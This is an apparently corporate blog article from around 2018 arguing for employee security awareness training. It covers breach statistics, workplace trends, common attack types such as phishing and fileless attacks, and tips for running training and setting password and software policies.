The Importance of Security Awareness

When hackers breached retail giant Target’s databases, they stole the credit and debit card information of more than 40 million customers. It remains one of the largest cybersecurity hacks in history.

Fast forward to today, and 2018 has seen trending news of cybersecurity incidents strike Macy’s, Whole Foods, Delta, Under Armour, Uber, Panera Bread and many, many more. This doesn’t even mention the cybersecurity tsunamis that have come to be synonymous with data-protection failures, network-security lapses or general IT infrastructure mismanagement.

It’s not just the big guys getting attacked. Small businesses make up nearly 61 percent of all cyber attack targets, up from 55 percent in 2016. Between halted operations and damage reparations, cyberattack cost the average small to medium business (SMB) over $2 million and have been known to shut down entire enterprises — sometimes permanently.

And remember that Target breach? It struck not because of internal, corporate IT negligence but because of a gateway that hackers found in one of Target’s HVAC vendors.

It’s hard to ignore what all this indicates — cyber threats are far more interwoven — and prevalent — than what meets the eye. When it comes to your employees’ preparedness in particular during the event of a cybersecurity emergency, organizations can no longer roll the dice.

Perhaps surprisingly, a recent CybSafe survey found that around 31% of businesses are without security awareness training whatsoever. A recent UK government survey, meanwhile, found UK businesses introduced fewer new security awareness training measures than they did in 2017.

“Businesses are less likely to have implemented extra staff awareness or training measures than in the 2017 survey (18% versus 28%), despite human error or staff awareness continuing to be among the most common factors contributing to the most disruptive breach.” Department for Digital, Culture, Media & Sport Cyber Security Breaches Survey 2018

So while security professionals might already understand the benefits of security awareness training, others, it seems, are yet to be convinced.

Why, then, is security awareness training still so important today? Here are 7 reasons.

1. To prevent breaches and attacks :

Starting with the most obvious, security awareness training helps prevent breaches.

The precise number of breaches security awareness training prevents is difficult to quantify. In an ideal world, we’d be able to run a controlled trial in which the exact same people working for the exact same company were divided into two groups: a control and a test group. The latter would be given training, the former would not. The two could then be compared.

Such a situation is an impossibility – but that doesn’t mean advanced security awareness training providers are unable to demonstrate the ROI of security awareness software. Although an imperfect measure, it’s possible to measure the incidence and prevalence of breaches pre- and post-awareness campaigns and use the resulting metrics to glean an indication of ROI. The metric might not be ideal, but considering the average costs of a data breach now run into the multi-millions, and considering security awareness training is relatively inexpensive, it certainly doesn’t take much for serious returns.

2. To influence company culture :

A culture of security has long been seen as the holy grail for chief information security officers (CISOs). Equally, such a culture is seen as notoriously difficult to achieve.

With the aid of security awareness training, some are heading in the right direction.

At least some of today’s security awareness training platforms acknowledge the value of a secure culture – and attempt to measure it from the outset. The same metrics are then monitored as time goes on.

By keeping an eye on indicators of culture, advanced security awareness training platforms can actually help security professionals monitor, nurture and develop a culture of security – making their people a proactive defence.

3. To make technological defences more robust :

Technological defences are, clearly, a valuable weapon in preventing breaches. But technological defences require input from people. Firewalls need to be turned on. Security warnings need to be acknowledged. Software needs to be updated.

Few businesses today would dream of operating without technological defences. And yet, without security awareness training, technological defences are not used to their full potential.

To make matters worse, attackers today rarely bother attempting to penetrate businesses through purely technological means. Today’s attackers typically prefer to target people, who are often seen as an easy way in to protected networks.

4. To win more customers :

Security awareness training helps people win more high-profile contracts.

This isn’t conjecture. During CybSafe’s recent survey of 250 IT decision makers, more than half said a business customer had made cyber security precautions part of either an existing contract or part of the RFP process in order to win the contract. More than two thirds said at least one customer had required the achievement of a recognised cyber security standard.

While security awareness training might seem unimportant to some, it’s often far from unimportant to some business customers.

5. For compliance :

To be clear, compliance alone is no reason to introduce security awareness training. As we’ve highlighted before, those who introduce training solely to comply with regulations are probably heading for trouble.

But more and more regulators are demanding specific industries implement security awareness training.

“Over the next year, we will strengthen our supervisory assessments of the highest impact firms to better understand their current and planned use of technology, resilience to cyber-attacks and staff expertise. We will also review how governance, strategy, systems architecture, risk management and culture contribute to firms’ data security.”

CybSafe partner, the Financial Conduct Authority, on shaping future policies

Compliance can be a happy offshoot of security awareness training. Those who introduce it become more secure and, in many industries, meet a regulatory requirement.

6. To behave in a socially responsible manner :

As WannaCry and NotPetya have recently demonstrated, cyber attacks spread at unprecedented speeds. The more networks that become infected, the more at-risk other networks become.

Equally, thanks to connected networks, a decrease in individual network security increases the overall threat landscape for others.

The absence of security awareness training in one organisation makes other organisations vulnerable. It’s a little like leaving your house door unlocked – with the keys to next door waiting inside.

Security awareness training doesn’t just benefit you. It benefits your customers, your suppliers and everyone else interlinked with your network.

7. For employee wellbeing :

It’s well-documented that happy people are productive people – hence employee welfare schemes, company away days and a large part of any given HR department’s focus. So it’s worth remembering: security awareness training doesn’t just keep people safe at work. It keeps them safe in their personal life, too.

For the most part, this particular benefit remains unseen. If security awareness training does what it’s supposed to do, it isn’t just an employer benefit. It’s an employee benefit, too.

Why It’s Important Now

Negligent employees, contractors and third-party vendors represent the cause of over half of all enterprise data breaches.

This is a sobering statistic, one that keeps network administrators and IT managers up at night. After all, employee negligence hardly represents intent. More often than not, good-intentioned employees make mistakes or skirt safe IT protocols because they’re tricked, rushed for time or are unaware there’s protocol set in the first place.

With cybersecurity incidents only projected to rise, so does the potential for employee errors and the employee-enacted data breaches that statistically precede them. The following workplace and cultural trends only emphasize why it’s more important than ever to establish cybersecurity awareness training with your employees:

1. Remote Work/Telecommuting

Telecommuting has become a reality rather than a fantasy for many workers thanks to mobile and cloud technologies. In less than ten years, businesses across the country have been able to incorporate substantial work-from-home policies, reshaping the ways companies view productivity, profitability and what it means to be a “good” worker.

• Half of the U.S. workforce currently holds a job compatible with telecommuting.
• Over 40 percent of businesses offer some form of flex work or a work-from-home option.
• Between 20 and 25 percent of the U.S. workforce already telecommutes with some frequency.
• Around 4 million people work at least half-time from home, or two to three days a week.
• By 2020, estimates show nearly 50 percent of workers will be working remotely at least part-time.

The same mobile and cloud technologies that have unleashed telecommuting also spells its greatest risk. For starters, businesses must shore up end-to-end remote networks for employees to safely connect back to the office. What’s more, these same employees must understand security liabilities and best-practices amongst any personal devices used for work or be offered corporate laptops, smartphones and more imbued with company-approved security features. Such efforts take commitment, time and training — hallmarks of cybersecurity awareness programs.

2. Increased Government Regulation

The importance of cybersecurity practices, training and systems isn’t isolated to private, internal business operations. Government agencies and legislators are catching on as well, with ripple effects that have changed the way private and public enterprises alike must protect their digital systems and information.

The past two decades have seen both state and federal movements to draft cybersecurity regulations. Within these, guidelines and mandates provide a structure for how businesses must install “reasonable” levels of security through protective software and hardware, as well as maintain “required security practices” amongst their employees, contractors and vendors.

Certain industries are affected by cybersecurity regulatory requirements more than others. For example, healthcare, finance and government contractors face industry-specific directives, most notably through the three following statutes, respectively:

• The Health Insurance Portability and Accountability Act (HIPAA)
• The Gramm-Leach-Bliley Act (GLBA), otherwise known as the Financial Services Modernization Act
• The Homeland Security Act and the Federal Information Security Mangement Act (FISMA)

Depending on your industry, you may be required to perform routine cybersecurity awareness training in addition to these compliance measures.

3. The Internet of Things (IoT)

While we’re currently still in the infancy of a widespread Internet of Things, businesses and their employees across the country must be preemptive, not reactive, to its impending landscape. With the vast majority of employees using a personal device to access company networks or perform company work — and those devices poised to be more interconnected and communicative with other devices and networks — cybersecurity vulnerabilities only compound.

The IoT makes “bring your own device” (BYOD) workplace policies and standardized best-practices even more pressing. After all, many employee mobile devices today lack appropriate defenses against threats like mobile malware, email phishing and more.

Types of Attacks Employees Are Susceptible To

Strong security awareness training should directly address today’s (and tomorrow’s) most pressing cybersecurity hazards.

In other words, training prepares employees, which in turn prepares enterprises. The more your employees know, the more they’re able to identify and avoid the following cybersecurity storms:

1. Phishing

Also known as social-engineering attacks, phishing constitutes the most common form of business cyber threats. Almost half of surveyed SMBs experienced a phishing-based security breach attempt, while large companies and organizations follow right behind, at 42 percent.

Phishing scams aim for employees to click malicious links or download tainted materials, typically embedded in emails. These links then establish a direct gateway for cybercriminals to breach private networks and extract data. Links can appear internal or external facing, with phishers becoming increasingly sophisticated, manipulating SSL encryption and HTTPS to lure employees into thinking a website or profile is safe.

Similarly, phishing also extends to emails and messages that aim to elicit sensitive information from your employees directly. Emails appear to come from another employer, manager or even a familiar third-party, tricking employees into thinking they’re responding to something business-critical.

2. Malware Email Attacks

Malware email attacks are a subset of broader malware threats that use email downloads as their primary weapon. They’re also a risk category on the rise, with Symantec’s 2018 Internet Security Threat Report indicating that nearly 88 percent of these attacks use malware-laden email attachments employees download to breach a device, server or network.

One click from an employee is all it takes. Once a tainted attachment is downloaded, the malware infects its target and can cause irreversible damage to files, databases and even the entire server.

Watchdog reports indicate over 72 percent of email malware breaches occur in businesses with 100 employees or fewer. Small businesses themselves are technically defined as those with 250 employees or fewer. Similar email malware attack studies have found that the average small business receives at least nine infected emails a month per employee.

3. Fileless Attacks

One of the more contemporary cybersecurity threats is known as a fileless attack. As its name suggests, fileless attacks do not rely on malicious attachments or links. Instead, they work with what’s already there — software, applications and programs your employees use regularly that may be vulnerable due to age or lack of updates.

Fileless attacks are ten times more likely to succeed than traditional, file-based email phishing or attachment scams. That’s because they can be nearly untraceable to the average worker. Once an attacker has exploited an application vulnerability, they effectively build a digital portal only they can cross. That bridge allows them to spy, take control, administer and even extract sensitive data straight from core operating systems.

Fileless attacks remain relatively unknown to the average employee. To compound the issue, most anti-virus or intrusion detection software isn’t designed to root out these threats.

4. Employee Errors

Human errors leading to data breaches and sensitive information leaks account for nearly a third of enterprise security incidents overall.

These numbers fall behind only phishing and malware attachment attacks in terms of prevalence. And while it may sound the least harmful of cybersecurity attack types, it’s far from it. Even small employee errors can result in everything from regulatory noncompliance to irreconcilable data loss, typically after the following accidents:

• Unintended disclosures, such as faxes sent to the wrong extension, emails sent to the wrong recipient or files being shared with the wrong vendor.
• Improper disposals, primarily when employees do not dispose of paper-based documents containing sensitive data in a thorough, secure manner.
• Accidental deletions, with employees erasing important files or entire databases. This issue gets compounded if a department or organization has not been habitually backing up data.

The Awareness Tactics You Should Use

When it comes to cybersecurity awareness, the best defense truly is a strong offense.

Businesses can’t rest on their laurels, maintaining legacy systems or recycling the same old security practices. Network managers have a range of tactics to deploy to educate employees and nurture stronger cybersecurity awareness.

1. Speak Their Language

Leave the technical jargon, industry-speak and million-dollar words at the door. You’re engaging real people across real, diverse departments, not writing a dissertation.

Cybersecurity awareness will stick when it’s tailored to its audience. Highlight specific examples of how new policies and procedures will make employees’ work lives easier, not more tedious or stressful. Walk them through department-specific, pertinent security examples. Use relevant metaphors. And most of all, keep things common sense. Practical, everyday solutions go a long way to risk-mitigate employee errors.

2. Make Trainings Engaging…

The best tactic to institutionalize cybersecurity awareness training is to make it a full activity for your employees, not a passive obligation.

Many strategies can be employed to do so. Paper sessions, quizzes and questionnaires completed beforehand primes employees for their security insights and experiences. These provide direct fodder for the materials covered during training, with employees more invested in what’s discussed since they’ve already put time and thought into it.

Furthermore, don’t be afraid to step outside the box when it comes to the training and presentations themselves. Utilize multimedia, stories and even hands-on activities for more impactful sessions.

3. …And Quantifiable

Awareness tactics are only as good as their results. And the results are only good if they can be seen and measured. For security awareness training, identify performance goals and their baselines before new policies and procedures get implemented. Track these goals with relevant KPIs, then tweak and tailor accordingly.

4. Remain Positive

Scare tactics and apocalyptic breach stories only go so far, particularly to non-tech employees who may see themselves as removed from the cybersecurity and IT narrative.

Instead, balance stressing the importance of cybersecurity awareness with positive updates. Report on progress, share examples of jobs and tasks made safer as well as errors caught or threats mitigated. This keeps up momentum and reframes the importance of cybersecurity from doom-and-gloom vigilance to victory.

The work network managers and IT personnel do is only part of the puzzle. If cybersecurity organizational buy-in across departments doesn’t take hold, then any effort will inevitably fall short of outlined goals.

The key to inter-departmental institutionalization lies in the three “Fs” — focus, functionality and frequency. When cultivated, the three Fs bring all employees on board for a tighter, more cyber-secure environment.

1. Start With the Passwords

Maintaining a robust employee password policy is like eating vegetables — everyone knows they should be doing it, but few actually do.

This needs to change. Over 59 percent of IT managers surveyed stated they did not have administrative visibility into their employees’ password practices. This opens the floodgates for security risks, with employees potentially recycling the same word or phrase — if they’re changing it at all.

Employing password standards is a baseline cybersecurity awareness measure, but one that works. When combined with multi-factored authenticity, strong passwords create the first line of network and application defense employees everywhere can take ownership of.

2. Implement Access-Only Applications

Creating access-only applications and files helps reduce the chance of employee errors, such as unintended disclosures or accidental deletions. It also risk-mitigates the extent to which certain fileless attacks can burrow into databases. A smaller pool of people with application access means a smaller pool of targets for hackers.

What’s more, depending on your organization’s industry, installing access-only permissions might be a mandatory regulatory standard.

3. Be Choosy When It Comes to Software

Software used cross-departmentally and throughout the entire organization must be vetted and researched, with particular attention paid to their end-to-end encryption features. Department managers each bear a responsibility to conduct such assessments and add core applications to an organizational whitelist, the series of approved software all employees can use.

While tactics like whitelisting aren’t foolproof, they give departments a leg-up on controlling illicit network and server gateways. It also complements other end-to-end point security activities, allowing organizations to be more aware of safer everyday operations, from how employees message one another to how third parties receive essential files.

4. Consider Certifications

Certifications like the ISO standards were created to bulk up a business’ information-security management. It builds data storage, security, utilization and communications best-practices into enterprise practices, allowing them to analyze current vulnerabilities and tailor contemporary solutions.

Also, ISO certifications aren’t evergreen — a pivotal perk when it comes to technology. Updating certifications keeps a business constantly in the know of cutting-edge cybersecurity threats and solutions. It also bolsters compliance efforts and instills an all-hands-on-deck, interdepartmental attention to preventing breaches, hacks and data loss.

You can’t turn back the clock on organizational security awareness. But you can tune your dials today, prepping employees, operations and technology for a better tomorrow.